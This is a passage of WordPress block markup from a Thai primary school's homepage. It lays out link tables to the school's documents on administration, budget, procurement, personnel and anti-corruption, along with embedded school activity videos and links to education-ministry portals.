{\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtu.be/C9do6YkaRVU?si=6QeXpJR-PUh7xatA\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/LVfYUq7zwYQ?si=PRL0_feQTmuxz4ZK\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/LVfYUq7zwYQ?si=PRL0_feQTmuxz4ZK\n</div></figure>\n<!-- /wp:embed --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n\n<!-- wp:image {\"id\":563,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1024x726.jpg\" alt=\"\" class=\"wp-image-563\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a 